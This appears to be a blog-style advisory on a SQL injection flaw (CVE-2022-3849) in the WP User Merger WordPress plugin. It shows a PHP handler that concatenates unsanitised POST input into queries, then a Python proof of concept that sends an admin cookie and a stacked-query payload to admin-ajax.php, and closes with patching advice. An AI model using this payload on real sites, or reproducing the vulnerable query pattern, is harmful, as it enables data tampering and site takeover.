CVE-2022-3849: SQL Injection Vulnerability in WP User Merger WordPress Plugin Prior to Version 1.5.3; Exploitable for Admin-level Users

The WP User Merger WordPress plugin is a powerful tool that allows website administrators to bulk merge users and their respective metadata across various WordPress installations, making the management of user accounts more efficient and centralized. Unfortunately, researchers have discovered a troubling SQL injection vulnerability impacting versions 1.5.2 and earlier. CVE-2022-3849 exposes this flaw and outlines the potential harm it could have on affected sites, their administrators, and their users. This post aims to provide insight into this vulnerability by examining the problematic code, pointing to original resources on the topic, and providing exploit details.

Problematic Code Snippet

The core issue arises from inadequate parameter sanitization and incorrect SQL escaping in the WP User Merger plugin. Within the affected versions, this code is the root of the problem:

add_action('wp_ajax_agileware_merge_users', function () {
    global $wpdb;

    $user_ids = implode(",", $_POST['users']);
    $main_user = get_user_by('id', $_POST['target_user']);

    $wpdb->query("UPDATE {$wpdb->base_prefix}usermeta SET user_id = $main_user->ID WHERE user_id IN ($user_ids)");
    $wpdb->query("DELETE FROM {$wpdb->base_prefix}users WHERE ID IN ($user_ids)");
});

As evident in the snippet above, the $_POST['users'] parameter is directly used in the SQL query, resulting in insufficient sanitization and leaving the plugin open to SQL injection vulnerabilities.

Original References

A security researcher initially discovered this vulnerability in WP User Merger and responsibly disclosed it via the following resources:

Source 1: Original Proof of Concept

Source 2: WPScan Vulnerability Database.

Exploit Details

To exploit this vulnerability, an attacker must have an administrator role or higher within a WordPress installation running the affected version of WP User Merger. By crafting a malicious HTTP request, the attacker can execute arbitrary SQL commands, which can lead to significant data breaches, unauthorized data manipulations, and potential takeover of the affected site.

Proof of Concept (PoC)

import requests

target_url = "https://example.com/wp-admin/admin-ajax.php";
admin_cookie = "<put_admin_cookie_here>"

headers = {
    "Cookie": admin_cookie,
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}

post_data = {
    "action": "agileware_merge_users",
    "users": "1,2,3); INSERT INTO <SQL_COMMAND_HERE>"
}

response = requests.post(url=target_url, headers=headers, data=post_data)

In the PoC above, an attacker with an admin cookie crafts a payload containing their desired SQL command and sends it in a POST request to the target_url. Upon successful execution, this request would yield potentially disastrous results.

Recommendations

The vulnerability documented herein is exploitable for users with an administrator role, which highlights the importance of maintaining good operational security practices. Always...

1. Assign appropriate roles within WordPress, granting users the minimum necessary permissions for their role.
2. Update all plugins to their latest versions to ensure they are not susceptible to known vulnerabilities.

Monitor any unusual activities on your WordPress site and take prompt action on suspicious events.

In the case of the WP User Merger plugin's SQL injection vulnerability, upgrading to version 1.5.3 or later will resolve the issue as it effectively patches the vulnerability.

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 12/02/2022 19:48:00 UTC